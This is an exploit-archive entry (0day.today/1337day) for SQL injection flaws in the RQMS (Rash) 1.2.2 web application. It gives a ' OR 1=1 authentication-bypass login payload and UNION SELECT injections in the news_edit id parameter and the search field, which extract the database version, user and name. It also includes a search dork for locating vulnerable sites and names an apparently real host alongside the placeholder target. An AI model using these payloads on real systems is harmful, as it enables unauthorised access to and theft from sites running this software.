RQMS (Rash) <= 1.2.2 Multiple SQL Injection Vulnerabilities

2009-04-14T00:00:00
ID 1337DAY-ID-5034
Type zdt
Reporter Dimi4
Modified 2009-04-14T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
RQMS (Rash) <= 1.2.2 Multiple SQL Injection Vulnerabilities
===========================================================


 ########################################
 #                                                                   
 # Product : RQMS                                          
 # Version : 1.2.2                                            
 # Dork : Rash Version: 1.2.1                           
 # Site: http://rqms.sourceforge.net                  
 # Found by: Dimi4                                         
 #                                                                  
 ########################################
Multiple Remote Vulnerabilities

Need: magic_quotes_gpc = OFF
1)Auth BYPASS
http://127.0.0.1/rash-v1.2.2/?admin
Login: ' OR 1=1/*

2) Sql-injection
http://nocude.maisum.net/?admin
http://target/rash-v1.2.2/?news_edit&id=4'+union+select+1,concat_ws(0x3a,version(),user(),database()),3/*

3) Sql-inj in Search
http://target//rash-v1.2.2/?search
Search: ' union select database(),version(),user(),4,5,6/*



#  0day.today [2018-02-18]  #